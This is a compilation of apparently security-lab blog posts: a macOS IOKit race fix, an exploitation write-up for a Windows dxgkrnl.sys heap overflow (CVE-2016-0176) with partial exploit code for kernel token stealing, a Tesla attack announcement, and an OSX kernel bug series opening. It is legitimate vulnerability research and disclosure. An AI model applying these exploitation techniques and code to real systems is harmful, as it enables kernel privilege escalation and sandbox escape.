            dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000
BSD process name corresponding to current thread: cmdqueue1
Boot args: keepsyms=1 -v
Mac OS version:
15F34
Kernel version:
Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
Kernel slide:     0x000000001dc00000
Kernel text base: 0xffffff801de00000
__HIB  text base: 0xffffff801dd00000
System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling the RIP register

__text:000000000002929E                 mov     esi, [rbx-10h]  ; unsigned int
__text:00000000000292A1                 mov     edx, [rbx-0Ch]  ; unsigned int
__text:00000000000292A4                 mov     rcx, [rbx-8]    ; unsigned __int64
__text:00000000000292A8                 mov     r8, [rbx]       ; unsigned __int64

We can see that at the crash address rbx has already gone out of bounds and hits an adjacent unmapped area, which leads to the crash.

Tested on MacBook Air and MacBook Pro machines running 10.11.5, with the command line:

while true; do ./cmdqueue1 ; done

Fix for these issues

The XNU sources for 10.12.2 haven’t been released yet, so let’s have a look at the disassembled kernel.

Originally, we have these lines when creating a descriptor:

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                            kIODirectionOut, current_task());

This is confirmed by disassembling the unpatched kernel:

mov     rax, gs:8
mov     rcx, [rax+308h] ; unsigned int
mov     edx, 2          ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

On 10.12.2, the corresponding snippet in _is_io_connect_method changed to:

mov     rax, gs:8
mov     rcx, [rax+318h] ; unsigned int
mov     edx, 20002h     ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown in a diaphora diff on IOMemoryDescriptor’s functions.

  if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source
    err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef);

The new option bit (4) is then checked at the beginning of this function:

  prot = 1;
  cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28;
  v4 = vmProtForCacheMode(cacheMode);
  prot |= v4;
  if ( cacheMode )
    prot |= 2u;
  if ( 2 != (this->baseclass_0._flags & 3) )
    prot |= 2u;
  if ( optionsa & 2 )
    prot |= 2u;
  if ( optionsa & 4 )
    prot |= 0x200000u;

prot is then used in mach_make_memory_entry_64 to describe the permissions of this mapping. 0x200000 is actually MAP_MEM_VM_COPY:

/* leave room for vm_prot bits */
#define MAP_MEM_ONLY        0x010000 /* change processor caching  */
#define MAP_MEM_NAMED_CREATE    0x020000 /* create extant object      */
#define MAP_MEM_PURGABLE    0x040000 /* create a purgable VM object */
#define MAP_MEM_NAMED_REUSE 0x080000 /* reuse provided entry if identical */
#define MAP_MEM_USE_DATA_ADDR   0x100000 /* preserve address of data, rather than base of page */
#define MAP_MEM_VM_COPY     0x200000 /* make a copy of a VM range */
#define MAP_MEM_VM_SHARE    0x400000 /* extract a VM range for remap */
#define MAP_MEM_4K_DATA_ADDR    0x800000 /* preserve 4K aligned address of data */

This means that descriptors passed in via IOKit now get a memory entry that is a copy (possibly copy-on-write), which prevents userspace from modifying the content the kernel sees in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry point.
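
The decompiled flag handling is easier to follow with names attached to the constants. The sketch below is a simplified restatement, not kernel code: the DESC_* and REF_* names are hypothetical labels for the raw numbers in the decompilation, the recursive memoryReferenceCreate call is reduced to "option bit 4 gets set", and the cache-mode contribution (vmProtForCacheMode) is left out on the assumption that the default cache mode adds no bits.

```c
#include <stdint.h>

#define VM_PROT_READ     0x1u
#define VM_PROT_WRITE    0x2u
#define MAP_MEM_VM_COPY  0x200000u   /* value from the header excerpt */

/* Hypothetical labels for constants seen in the decompilation. */
#define DESC_FLAG_COW    0x20000u    /* new flag passed by is_io_connect_method */
#define DESC_DIR_MASK    0x3u
#define DESC_DIR_OUT     0x2u        /* the "2" passed before the patch */
#define REF_OPT_WRITE    0x2u
#define REF_OPT_COW      0x4u

/* Caller side (simplified): a descriptor carrying 0x20000 has option
 * bit 4 added when its memory reference is created. */
uint32_t effective_options(uint32_t desc_flags, uint32_t options)
{
    if ((desc_flags & DESC_FLAG_COW) && !(options & REF_OPT_COW))
        options |= REF_OPT_COW;
    return options;
}

/* Protection bits handed to the memory-entry creation (cache mode omitted). */
uint32_t entry_prot(uint32_t desc_flags, uint32_t options)
{
    uint32_t prot = VM_PROT_READ;

    if ((desc_flags & DESC_DIR_MASK) != DESC_DIR_OUT)
        prot |= VM_PROT_WRITE;
    if (options & REF_OPT_WRITE)
        prot |= VM_PROT_WRITE;
    if (options & REF_OPT_COW)
        prot |= MAP_MEM_VM_COPY;
    return prot;
}
```

Under these assumptions, the pre-patch flags value 2 yields a plain read-only entry on the user's pages, while the patched value 0x20002 additionally requests MAP_MEM_VM_COPY, so the kernel works on a copy.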

Credits

Credit also goes to Liang Chen of KeenLab for contributing to this research. Kudos as well to the Apple security team for responding to and fixing these issues.

A Link to System Privilege

2016-11-18T07:29:39.000Z

A Detailed Description of CVE-2016-0176 and Its Exploitation

Essentials of a Successful Pwn of Microsoft Edge

A successful Pwn of Microsoft Edge consists of two essential parts: browser RCE (Remote Code Execution) and browser sandbox bypass. Browser RCE is typically achieved by exploiting a JavaScript vulnerability, while the sandbox bypass can be achieved in different ways: a logical sandbox escape, or EoP (Escalation of Privilege) through kernel vulnerabilities.

The sandbox of Microsoft Edge is built upon the access check mechanism. In the Windows operating system, resources are shared system-wide; for example, a file or device can be shared across different processes. Some resources contain sensitive information, and others are critical to the functioning of the whole system, so corrupting them will crash the system. For those reasons there must be strict checks when a process wants to access a specific resource; this is called the access check. When a resource is opened, the token of the subject process is checked against the security descriptor of the object resource. The access check consists of several elementary checks in different dimensions, such as ownership and group membership checks, privilege checks, integrity level and trust level checks, capability checks, etc. The previous generation of sandbox is based on the integrity level check: the sandboxed application runs at low integrity level and thus cannot access resources protected by medium or higher integrity levels. Microsoft Edge adopts a new generation of sandbox based on AppContainer, where additional capability checks are performed when accessing resources, on top of the basic integrity level check. For more details about the access check mechanism, refer to my talk at ZeroNights 2015: Did You Get Your Token?

The most common approach to a sandbox bypass is EoP through kernel vulnerabilities, with DKOM (Direct Kernel Object Manipulation) on token objects.

CVE-2016-0176

This is a heap overflow vulnerability in the dxgkrnl.sys driver.

The data structure that is abused is shown below:

typedef struct _D3DKMT_PRESENTHISTORYTOKEN
{
    D3DKMT_PRESENT_MODEL  Model; //D3DKMT_PM_REDIRECTED_FLIP      = 2,
    UINT                  TokenSize; // 0x438
    UINT64                CompositionBindingId;

    union
    {
        D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN        Flip;
        D3DKMT_BLTMODEL_PRESENTHISTORYTOKEN         Blt;
        D3DKMT_VISTABLTMODEL_PRESENTHISTORYTOKEN    VistaBlt;
        D3DKMT_GDIMODEL_PRESENTHISTORYTOKEN         Gdi;
        D3DKMT_FENCE_PRESENTHISTORYTOKEN            Fence;
        D3DKMT_GDIMODEL_SYSMEM_PRESENTHISTORYTOKEN  GdiSysMem;
        D3DKMT_COMPOSITION_PRESENTHISTORYTOKEN      Composition;
    }
    Token;
} D3DKMT_PRESENTHISTORYTOKEN;

I will use “history token” as an alias for this structure. The vulnerability has some prerequisites on this structure:

Model member should be set to D3DKMT_PM_REDIRECTED_FLIP;
TokenSize member should be set to 0x438;

You may have already guessed that the vulnerability is in the Token.Flip member, whose type is shown below:

typedef struct _D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN
{
    UINT64                                     FenceValue;
    ULONG64                                    hLogicalSurface;
    UINT_PTR                                   dxgContext;
    D3DDDI_VIDEO_PRESENT_SOURCE_ID             VidPnSourceId;

    ……
 
    D3DKMT_DIRTYREGIONS                        DirtyRegions;
} D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN;

Diving further into the last member, DirtyRegions:

typedef struct tagRECT
{
    LONG    left;
    LONG    top;
    LONG    right;
    LONG    bottom;
} RECT, *PRECT, NEAR *NPRECT, FAR *LPRECT; // 0x10 bytes

typedef struct _D3DKMT_DIRTYREGIONS
{
    UINT  NumRects;

    RECT  Rects[D3DKMT_MAX_PRESENT_HISTORY_RECTS]; // 0x10 * 0x10 = 0x100 bytes

     //#define D3DKMT_MAX_PRESENT_HISTORY_RECTS 16

} D3DKMT_DIRTYREGIONS;

Now we reach the primitive level: there is a DWORD member NumRects and an array of RECT structures, Rects. The array has a fixed size of 16 elements of 0x10 bytes each, so the size of Rects is 0x100 bytes.

The graph above shows the relationship and layout of the abused data structures. The left column is the data structure that we prepare in user mode and pass to the kernel-mode drivers by calling the Win32 API D3DKMTPresent. The middle column is the data structure that the dxgkrnl.sys driver receives and maintains; it is copied out of the user-mode buffer. The right column is the embedded union member Token.Flip. An important feature of this member is that it is the largest member of the union, and since the size of a union is determined by its largest member, the content of Token.Flip stretches to the end of the history token structure. This layout simplifies the exploitation to a large extent.

With knowledge of the abused data structures, the vulnerability is easy to understand. Below is the disassembly snippet that causes the overflow:

loc_1C009832A: DXGCONTEXT::SubmitPresentHistoryToken(......) + 0x67B
        cmp     dword ptr[r15 + 334h], 10h // NumRects
        jbe     short loc_1C009834B; Jump if Below or Equal(CF = 1 | ZF = 1)
        call    cs : __imp_WdLogNewEntry5_WdAssertion
        mov     rcx, rax
        mov     qword ptr[rax + 18h], 38h
        call    cs : __imp_WdLogEvent5_WdAssertion
loc_1C009834B: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6B2
        mov     eax, [r15 + 334h]
        shl     eax, 4
        add     eax, 338h
        jmp     short loc_1C00983BD
loc_1C00983BD: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6A5
        lea     r8d, [rax + 7]
        mov     rdx, r15; Src
        mov     eax, 0FFFFFFF8h;
        mov     rcx, rsi; Dst
        and     r8, rax; Size
        call    memmove

The r15 register is pointing to the buffer of history token at the entry of this piece of code. It first picks out the DWORD at 0x334 offset and compare it with 0x10, we already know that this DWORD is the Token.Flip.NumRects field, so it is checking if this field exceeds the capacity of the embedded array Token.Flip.Rects. If you are doing code auditing, and you see this check, you may feel frustrated and soliloquize that Microsoft already realized the potential problem here and done some check. But when you move forward, you will see after this check the code logs this abnormal behavior to the watch dog driver with assertion logic, and either branches initiated from this comparison will flow into the same code block at loc_1C009834B. Then you may think that the watch dog driver will invoke the bug check logic in case of overflow, but nothing happened actually. No matter what the value is in Token.Flip.NumRects field, the code flow will reach the block at loc_1C009834B, this block first does some arithmatic calculation based on the Token.Flip.NumRects field and then use it as the size of a memcpy operation.

I rewrote this disassembly as C++ code below:

D3DKMT_PRESENTHISTORYTOKEN* hist_token_src = BufferPassedFromUserMode(…);
D3DKMT_PRESENTHISTORYTOKEN* hist_token_dst = ExpInterlockedPopEntrySList(…);

if(hist_token_src->dirty_regions.NumRects > 0x10)
{
    // log via watchdog assertion; does NOT work in free/release builds
}

auto size = (hist_token_src->dirty_regions.NumRects * 0x10 + 0x338 + 7) & ~7u; // round up to a multiple of 8, as the lea/and pair does
auto src = (uint8_t*)hist_token_src;
auto dst = (uint8_t*)hist_token_dst;
memcpy(dst, src, size);

Things become clear in the C++ code. Whatever Token.Flip.NumRects is, the dxgkrnl.sys driver performs a memcpy. The source of this memcpy is the buffer we pass from user mode by calling the Win32 API function D3DKMTPresent; the destination is a buffer taken from the kernel-mode pool by ExpInterlockedPopEntrySList; the size is the size of the buffer before the array plus the size of Token.Flip.NumRects array elements. If we pass a value larger than 0x10 in the Token.Flip.NumRects field of the user-mode buffer, an overflow into the kernel-mode paged pool occurs. We control the size of the overflow as well as its first 0x38 bytes of content. (0x38 more bytes can be set after the end of the history token; check the layout graph for more details.)
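As a quick check of the arithmetic, here is a minimal C sketch of the size computation. It assumes the layout described in this post (0x338 bytes before the array, 0x10 bytes per rectangle, 0x438 bytes per token); the names copy_size and overflow_bytes are made up for illustration and do not exist in dxgkrnl.sys.

```c
#include <assert.h>
#include <stdint.h>

#define TOKEN_HEADER_SIZE 0x338u /* bytes before the embedded Rects array */
#define RECT_SIZE         0x10u  /* one rectangle: four 32-bit fields */
#define MAX_RECTS         0x10u  /* capacity of the embedded array */
#define TOKEN_SIZE        (TOKEN_HEADER_SIZE + MAX_RECTS * RECT_SIZE) /* 0x438 */

/* Mirrors the shl/add/lea/and sequence: 32-bit arithmetic, rounded up to 8. */
uint32_t copy_size(uint32_t num_rects)
{
    /* Precondition of this sketch only: keep the 32-bit sum from wrapping. */
    assert(num_rects <= 0x0FFFFFCCu);
    uint32_t size = (num_rects << 4) + TOKEN_HEADER_SIZE;
    return (size + 7u) & 0xFFFFFFF8u;
}

/* Bytes copied past the end of a 0x438-byte destination token. */
uint32_t overflow_bytes(uint32_t num_rects)
{
    uint32_t size = copy_size(num_rects);
    return size > TOKEN_SIZE ? size - TOKEN_SIZE : 0u;
}
```

With NumRects = 0x10 the copy is exactly 0x438 bytes and nothing spills; with NumRects = 0x11 it is 0x448 bytes, i.e. 0x10 bytes past the end of the destination token.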

This vulnerability is interesting because Microsoft had already foreseen it but failed to prevent it. The lesson is not to fully trust a best practice, such as an assertion mechanism, unless you know exactly how it behaves.

Exploitation

For exploitation of a heap overflow, the layout of the destination buffer is very important. We already know that the destination buffer is allocated from kernel-mode paged pool with ExpInterlockedPopEntrySList function.

With a little debugging work, we can get some basic information about the destination buffer.

kd> u rip-6 L2
dxgkrnl!DXGCONTEXT::SubmitPresentHistoryToken+0x47b:
fffff801`cedb80fb call    qword ptr [dxgkrnl!_imp_ExpInterlockedPopEntrySList (fffff801`ced77338)]
fffff801`cedb8101 test    rax,rax
kd> !pool rax
Pool page ffffc0012764c5a0 region is Paged pool
*ffffc0012764b000 : large page allocation, tag is DxgK, size is 0x2290 bytes
    Pooltag DxgK : Vista display driver support, Binary : dxgkrnl.sys

It is a large buffer of 0x2290 bytes. Since that is larger than one page (a page is 0x1000 bytes), it is served as a large page allocation, which in this case consumes 3 contiguous pages. The extra bytes after offset 0x2290 are reclaimed and linked back into the paged pool free list, with an extra separating pool entry tagged “Frag” added in between. For more information about the Windows kernel pool layout and large page allocations, please refer to Kernel Pool Exploitation on Windows 7. Below is how the memory looks at offset 0x2290:

kd> db ffffc0012764b000+0x2290 L40
ffffc001`2764d290  00 01 02 03 46 72 61 67-00 00 00 00 00 00 00 00  ....Frag........
ffffc001`2764d2a0  90 22 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ."..............
ffffc001`2764d2b0  02 01 01 00 46 72 65 65-0b 43 44 9e f1 81 a8 47  ....Free.CD....G
ffffc001`2764d2c0  01 01 04 03 4e 74 46 73-c0 32 42 3a 00 e0 ff ff  ....NtFs.2B:....

DXGPRESENTHISTORYTOKENQUEUE::GrowPresentHistoryBuffer is responsible for allocating history tokens and managing them as a singly-linked list. Each history token is 0x438 bytes in size, which grows to 0x450 bytes once the pool header and padding bytes are counted. The large page allocation is divided into 8 history tokens, linked in reverse order to form the singly-linked list. The dxgkrnl.sys driver uses this slist as a look-aside list to serve history token allocation requests.

This singly-linked list looks as below initially:

The singly-linked list looks as below after serving 1 history token allocation request:

The singly-linked list looks as below after serving 2 history token allocation requests:

With knowledge of the memory layout of the destination buffer of the heap overflow, we have 2 ideas for exploitation:

Idea 1. Overflow the buffer after offset 0x2290, which may be reused by small allocations from the paged pool:

Idea 2. Overflow the adjacent history token’s header, which lets us abuse the singly-linked list:

The first idea has some limitations. Recall that we control only 0x38 bytes of the overflowed content, which means we control almost nothing beyond the padding bytes, the separating Frag pool entry and the following pool entry’s header.

The second idea seems promising. Although the Windows kernel now enforces strict validation of doubly-linked lists, it does not check singly-linked lists, so we can play redirection tricks on the slist.

Let’s do some thought experiments, just like Einstein, for idea 2. In the graphs above, we see that after popping 2 history tokens off the slist, we can overflow node B and overwrite the header of node A. Then we push node B back to the slist:

What happens after we push node A back to the slist? Will it redirect the next pointer to the overwritten QWORD?

Actually this will never happen, because when we push node A back to the slist, the overwritten QWORD in node A’s header is restored to point to node B:

Then we try another possibility. First go back to the state after popping 2 nodes off the slist:

This time we first push node A back to the slist:

Then we overflow node B to overwrite node A’s header. Because node A has already been returned to the slist, its header will not be restored any more. Now the slist is broken and redirected to the overwritten QWORD:
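The two orderings can be replayed in a toy user-mode model. This is only a sketch under simplifying assumptions: slots are 0x40 bytes instead of 0x450, there is no pool header between slots, and the list is not interlocked. All names (toy_slist, toy_push, toy_pop, toy_scenario) are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE 0x40u /* toy slot size; the real slots are 0x450 bytes */
#define SLOTS     4u

typedef struct {
    unsigned char *head;                     /* first free slot, or NULL */
    unsigned char  arena[SLOT_SIZE * SLOTS]; /* slots are adjacent in memory */
} toy_slist;

/* Each free slot stores its "next" pointer in its first bytes. */
static unsigned char *get_next(const unsigned char *slot)
{
    unsigned char *next;
    memcpy(&next, slot, sizeof next);
    return next;
}

void toy_push(toy_slist *l, unsigned char *slot)
{
    memcpy(slot, &l->head, sizeof l->head);  /* rewrites the slot header */
    l->head = slot;
}

unsigned char *toy_pop(toy_slist *l)
{
    unsigned char *slot = l->head;
    if (slot != NULL)
        l->head = get_next(slot);            /* trusts the header blindly */
    return slot;
}

/* Returns 1 if the list head ends up at `fake` once A is handed out again. */
int toy_scenario(int push_a_before_overflow, unsigned char *fake)
{
    toy_slist l = { NULL, { 0 } };
    unsigned char payload[SLOT_SIZE + sizeof fake];
    unsigned i;

    for (i = 0; i < SLOTS; i++)              /* highest slot ends up at the head */
        toy_push(&l, l.arena + i * SLOT_SIZE);

    unsigned char *a = toy_pop(&l);
    unsigned char *b = toy_pop(&l);
    assert(b + SLOT_SIZE == a);              /* A sits directly after B */

    memset(payload, 0x41, SLOT_SIZE);
    memcpy(payload + SLOT_SIZE, &fake, sizeof fake);

    if (push_a_before_overflow) {
        toy_push(&l, a);                     /* A's header is now live */
        memcpy(b, payload, sizeof payload);  /* unchecked copy spills into A */
    } else {
        memcpy(b, payload, sizeof payload);  /* corrupts A's header... */
        toy_push(&l, b);
        toy_push(&l, a);                     /* ...but the push rewrites it */
    }

    unsigned char *popped = toy_pop(&l);     /* A is handed out again */
    assert(popped == a);
    return l.head == fake;
}
```

Only the ordering in which A is pushed back before B overflows leaves the head pointing at the attacker-chosen value, so the next pop would hand out that address as if it were a history token.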

After this series of thought experiments, idea 2 looks more promising for exploitation, so let’s get our hands dirty. It seems that we need to pop and push the slist out of order to trigger the redirection above, with at least 2 consecutive pops. I made the following attempts:

1st Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer.

This time I failed. It turned out that the loop just pops node A and pushes node A back again, so I can only overflow as in idea 1. The reason is simple: those D3DKMTPresent API calls are served in turn, so we need to call it concurrently.

2nd Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads.

This time I failed again. After checking some disassembly, I believe the call stack of D3DKMTPresent is protected by a lock.

After those 2 tries, I started to doubt whether 2 consecutive pops were doable at all. I abandoned this doubt quickly after realizing that a complex slist would not have been built just to hold 1 element at a time, so there must be other call stacks that pop the slist. I wrote a WinDbg script to log push and pop operations, and tried launching some graphics-intensive applications while running the 2nd try. Then a miracle happened: while I was playing the built-in Solitaire game, a double pop occurred. I debugged it and found that the BitBlt API triggers pops from the slist through another call stack.

3rd and Last Try: Loop calling D3DKMTPresent with overflowing fields set in the buffer from multiple threads, while loop calling BitBlt from multiple other threads.

It succeeded in redirecting the next pointer in the slist, which leads to an arbitrary write to kernel-mode memory. But it is still far from perfect: we need to find the tokens of the current and system processes and do token stealing. This takes more than 1 read and write, but the trick above is not easily repeatable, especially under the strict rules of Pwn2Own 2016, which allow only 3 tries within 15 minutes. Some more tricks are needed.

Some More Tricks

Repeatable arbitrary read and write into kernel-mode memory

I used Win32k bitmap objects as intermediate targets. I first sprayed lots of bitmap objects into kernel-mode memory, and then guessed their addresses as targets of the redirected write. If I succeeded in hitting one of those bitmap objects, I modified its buffer pointer and size fields to make it point to another bitmap object. So 2 bitmap objects are in use: the first controls the address of reads and writes, and the second does the actual reading and writing.

Actually I sprayed bitmap objects into a 4GB range of memory. I first sprayed large 256MB bitmap objects to reserve contiguous and well-aligned pool memory, then replaced them with small 1MB bitmap objects whose addresses are aligned on a 0x100000 boundary, which makes guessing much easier.
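To illustrate why the 1MB alignment helps, the following C sketch enumerates candidate addresses at a 0x100000 stride starting from a leaked hint. It is a hypothetical helper, not the ThNextGuessedAddr routine used in the exploit code (whose body is not shown in this post); the names align_up, nth_guess and candidate_count are assumptions.

```c
#include <assert.h>
#include <stdint.h>

#define SPRAY_RANGE 0x100000000ull /* 4GB sprayed range */
#define SPRAY_ALIGN 0x100000ull    /* 1MB bitmap alignment */

/* Rounds addr up to the next multiple of align (align must be a power of two). */
uint64_t align_up(uint64_t addr, uint64_t align)
{
    assert(align != 0 && (align & (align - 1)) == 0);
    return (addr + align - 1) & ~(align - 1);
}

/* Number of distinct aligned candidates inside the sprayed range. */
uint64_t candidate_count(void)
{
    return SPRAY_RANGE / SPRAY_ALIGN;
}

/* n-th guess above a leaked hint address, wrapping inside the sprayed range. */
uint64_t nth_guess(uint64_t hint, uint64_t n)
{
    return align_up(hint, SPRAY_ALIGN) + (n % candidate_count()) * SPRAY_ALIGN;
}
```

With this alignment a 4GB range contains only 4096 possible object start addresses, so each guess has a realistic chance of landing on a sprayed bitmap.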

An information leak is needed as a hint for guessing the addresses of the sprayed bitmap objects; this is done with the help of user32!gSharedInfo.

Token Stealing

With repeatable arbitrary read and write, plus the nt kernel module base address leaked by sidt, we can easily find the address of nt!PspCidTable. We can then find the _EPROCESS objects of the current and system processes by parsing this table, get the respective _TOKEN object addresses, and finally do the token stealing.

Exploitation Code(parts)

VOID ThPresent(THREAD_HOST * th)
{
    SIZE_T hint = 0;
    while (TRUE)
    {
        HIST_TOKEN ht = { 0, };
        HtInitialize(&ht);

        SIZE_T victim_surf_obj = ThNextGuessedAddr(th, ++hint);

        SIZE_T buffer_ptr = victim_surf_obj + 0x200000 + 0x18;
        th->backupBufferPtr1 = victim_surf_obj + 0x258;
        th->backupBufferPtr2 = victim_surf_obj + 0x200000 + 0x258;

        SIZE_T back_offset = 0x10;

        SURFOBJ surf_obj = { 0, };

        surf_obj.cjBits = 0x80;
        surf_obj.pvBits = (PVOID)buffer_ptr;
        surf_obj.pvScan0 = (PVOID)buffer_ptr;
        surf_obj.sizlBitmap.cx = 0x04;
        surf_obj.sizlBitmap.cy = 0x08;
        surf_obj.iBitmapFormat = 0x06;
        surf_obj.iType = 0;
        surf_obj.fjBitmap = 0x01;
        surf_obj.lDelta = 0x10;

        DWORD dwBuff = 0x04800200;
        HtSetBuffer(&ht, 0x18 + th->memberOffset - back_offset, (unsigned char*)&surf_obj, 0x68);
        HtSetBuffer(&ht, 0x70 + th->memberOffset - back_offset, &dwBuff, sizeof(DWORD));


        if (th->memberOffset - back_offset + 0xE8 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0xE0;
            HtSetBuffer(&ht, 0xE0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0xE8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }


        if (th->memberOffset - back_offset + 0x1C0 < 0x448)
        {
            SIZE_T qwBuff = victim_surf_obj + 0x1B8;
            HtSetBuffer(&ht, 0x1B8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
            HtSetBuffer(&ht, 0x1C0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T));
        }

        HtOverflowNextSListEntry(&ht, victim_surf_obj);
        HtTrigger(&ht);

        if (th->triggered)
            break;
    }
}

VOID ThTrigger(THREAD_HOST * th)
{
    SIZE_T i = 0;
    HANDLE threads[TH_MAX_THREADS] = { 0, };
    unsigned char second_buffer[0x78] = { 0, };

    for (SIZE_T i = 0; i < TH_MAX_THREADS; i++)
    {
        if (th->triggered)
        {
            break;
        }

        if (i == 9)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, ProbeThreadProc, th, 0, &thread_id);
        }
        else if (i % 3 != 0 && i > 0x10)
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, PresentThreadProc, th, 0, &thread_id);
        }           
        else
        {
            DWORD thread_id = 0;
            threads[i] = CreateThread(NULL, 0, BitbltThreadProc, th, 0, &thread_id);
        }
    }

    for (i = 0; i < TH_MAX_THREADS; i++)
    {
        if (threads[i] != NULL)
        {
            if (WAIT_OBJECT_0 == WaitForSingleObject(threads[i], INFINITE))
            {
                CloseHandle(threads[i]);
                threads[i] = NULL;
            }
        }
    }

    Log("trigged\n");

    ThRead(th, (const void*)th->backupBufferPtr2, second_buffer, 0x78);

    ADDR_RESOLVER ar = { 0, };
    ArInitialize(&ar, th);

    SIZE_T nt_addr = ArNTBase(&ar); 
    SIZE_T psp_cid_table_addr = nt_addr + PSP_CIDTABLE_OFFSET;
    SIZE_T psp_cid_table_value;

    ThRead(th, psp_cid_table_addr, &psp_cid_table_value, 0x08);

    SIZE_T psp_cid_table[0x0C] = { 0, };
    ThRead(th, psp_cid_table_value, psp_cid_table, 0x60);

    SIZE_T table_code = psp_cid_table[1];
    SIZE_T handle_count = psp_cid_table[0x0B] & 0x00000000ffffffff;

    SIZE_T curr_pid = GetCurrentProcessId();

    do
    {
        ThParseCidTable(th, table_code, handle_count);
        Sleep(1000);
    } while (th->currentEprocess == NULL || th->systemEprocess == NULL);

    SIZE_T curr_proc = th->currentEprocess;
    SIZE_T system_proc = th->systemEprocess;

    SIZE_T system_token = 0;
    ThRead(th, (system_proc + 0x358), &system_token, 0x08);

    SIZE_T curr_token = 0;
    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);

    ThWrite(th, (curr_proc + 0x358), &system_token, 0x08);

    ThRead(th, (curr_proc + 0x358), &curr_token, 0x08);
    
    ThRestore(th);

    Log("elevated\n");

    Sleep(3600000);

    return;
}

Car Hacking Research: Remote Attack Tesla Motors

2016-09-19T15:26:19.000Z

After several months of in-depth research on Tesla cars, we have discovered multiple security vulnerabilities and successfully implemented remote control, i.e. without physical contact, of a Tesla Model S in both Parking and Driving Mode. It is worth noting that we used an unmodified car with the latest firmware to demonstrate the attack.

Following the global industry practice on “responsible disclosure” of product security vulnerabilities, we have reported the technical details of all the vulnerabilities discovered in the research to Tesla. The vulnerabilities have been confirmed by Tesla Product Security Team.

Keen Security Lab appreciates the proactive attitude and efforts of the Tesla Security Team, led by Chris Evans, in responding to our vulnerability report and taking action to fix the issues efficiently. Keen Security Lab is coordinating with Tesla on the fixes to ensure the driving safety of Tesla users.

As far as we know, this is the first case of a remote attack that compromises the CAN Bus to achieve remote control of Tesla cars. We have verified the attack vector on multiple varieties of Tesla Model S. It is reasonable to assume that other Tesla models are affected. Keen Security Lab would like to send out this reminder to all Tesla car owners:

PLEASE DO UPDATE THE FIRMWARE OF YOUR TESLA CAR TO THE LATEST VERSION TO ENSURE THAT THE ISSUES ARE FIXED AND AVOID POTENTIAL DRIVING SAFETY RISKS.

The video below demonstrates the impact of our remote attack vector. REMINDER: WHAT YOU ARE ABOUT TO SEE IN THIS VIDEO IS PERFORMED BY PROFESSIONAL RESEARCHERS, DO NOT TRY THIS AT HOME.

The Journey of a complete OSX privilege escalation with a single vulnerability - Part 1

2016-07-29T14:12:41.000Z

In previous blog posts Liang talked about the userspace privilege escalation vulnerability we found in WindowServer. In the following articles I will talk about the Blitzard kernel bug we used in this year’s Pwn2Own to escape the Safari renderer sandbox, which lives in the blit operation of the graphics pipeline. From an exploiter’s perspective, we took advantage of a vector out-of-bounds access which, under carefully prepared memory conditions, leads to a write-anywhere-but-value-restricted primitive, and used it to achieve both infoleak and RIP control. In this article we will introduce the exploitation methods we played with, mainly in kalloc.48 and kalloc.4096.

First we will introduce the function in which the overflow occurs, what we can control and how this affects the rest of the exploitation.

The IGVector add function

char __fastcall IGVector::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector::grow(this, 2 * v3);
  if ( v4 )
  {
LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;
}

IGVector is a generic template collection class used frequently in Apple graphics drivers. The currentSize field lies at its head, followed by capacity, which denotes the current capacity of the vector. The storage pointer comes after the capacity field and records the actual location of the heap objects.
rect_pair_t holds a pair of rectangles, each of which corresponds to a drawing section on screen. The fields of a rect are as follows:

int16 x
int16 y
int16 w
int16 h

x,y denote the coordinates of the rect’s corner on screen, while w,h denote the width and height of the rectangle. The four fields uniquely locate a rectangle on screen. The initial rectangle arguments are passed in as integers, but after a series of multiplications and divisions they become IEEE 754 floating-point numbers in memory, which makes Hex-Rays suffer a lot because it can hardly deal with SSE floating-point instructions :(

